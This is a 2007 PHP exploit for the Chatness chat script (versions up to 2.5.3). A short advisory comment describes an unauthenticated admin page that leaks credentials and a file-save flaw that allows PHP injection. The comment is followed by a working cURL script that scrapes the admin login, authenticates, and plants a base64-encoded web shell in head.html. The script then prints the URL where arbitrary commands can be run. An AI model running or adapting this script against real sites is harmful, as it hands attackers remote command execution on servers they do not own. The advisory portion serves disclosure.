<?/* Files: options.php, save.php Affects: Chatness <= 2.5.3 Date: 12th April 2007 Issue Description: ======================================================================== === Chatness suffers with two main vulnerabilities, the first of these in /admin/options.php the problems occur because the script first fails to verify if the user is in fact an administrator and secondly it prints the administrators username and password in plain text as part of the pre-filled form. The second issue occurs in /admin/save.php and /index.php while save.php limits writing to just .html extended filenames it is possible for an attacker to overwrite either foot.html or head.html to contain arbitrary php code which would then be executed when included by index.php ======================================================================== === Scope: ======================================================================== === Combined these two seperate issues will allow an attacker to gain access to the system and execute code/commands of their choice. ======================================================================== === Recommendation: ======================================================================== === Until a patch is availible it would be advisable to chmod both foot.html and head.html to a mode that makes them unwritable by the web server, this will minimize the risk of arbitrary code execution. ======================================================================== === Discovered By: Gammarays */?> <?php echo "########################################################n"; echo "# Special Greetings To - Timq,Warpboy,The-Maggot #n"; echo "########################################################nnn"; $payload = "JTNDJTNGcGhwK2lmJTI4aXNzZXQlMjglMjRfR0VUJTVCJTI3Y21kJTI3JTVEJTI5JTI5JTd CZWNobytzaGVsbF9leGVjJTI4dXJsZGVjb2RlJTI4JTI0X0dFVCU1QiUyN2NtZCUyNyU1RCU yOSUyOSUzQmRpZSUyOCUyOSUzQiU3RCUzRiUzRQ=="; $payload = base64_decode($payload); if($argc!=2) die("Usage: <url> ntEx: http://www.example.com/chatness/n"); $url = $argv[1]; $ch = curl_init($url . "admin/options.php"); if(!$ch) die("Error Initializing CURL"); echo "[ ] Attempting To Fetch Admin Login...n"; curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $res = curl_exec($ch); if(!$res) die("Error Connecting To Target"); $httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE); if($httpresult!=200) die("Error - URL Appears To Be Incorrect"); //Not good - but it works...sometimes $junkarray = explode("id=",$res); $junkarray = explode(""",$junkarray[14]); $username = $junkarray[3]; $junkarray = explode("id=",$res); $junkarray = explode(""",$junkarray[15]); $password = $junkarray[3]; echo "[ ] Found Username And Password - ".$username." / ".$password."n"; echo "[ ] Logging In...n"; //Login curl_setopt($ch, CURLOPT_URL,$url . "admin/login.php"); curl_setopt($ch, CURLOPT_COOKIEJAR, "mrcookie.dat"); curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS,"user=".$username."&pass=".$password."&submit=Login") ; $res = curl_exec($ch); if(!res) die("Error Connecting To Target"); $httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE); if($httpresult==200) die("Error Invalid Username/Password"); echo "[ ] Login Succeeded..n"; //Deploy Main Payload curl_setopt($ch, CURLOPT_URL,$url . "admin/save.php?file=head"); curl_setopt($ch, CURLOPT_COOKIEFILE, "mrcookie.dat"); curl_setopt($ch, CURLOPT_POSTFIELDS,"html=".$payload); $res = curl_exec($ch); if(!res) die("Error Connecting To Target"); echo "[ ] Payload Deployedn"; echo "[ ] Shell Accessible at ".$url."index.php?cmd=<yourcommand>"; curl_close($ch); ?>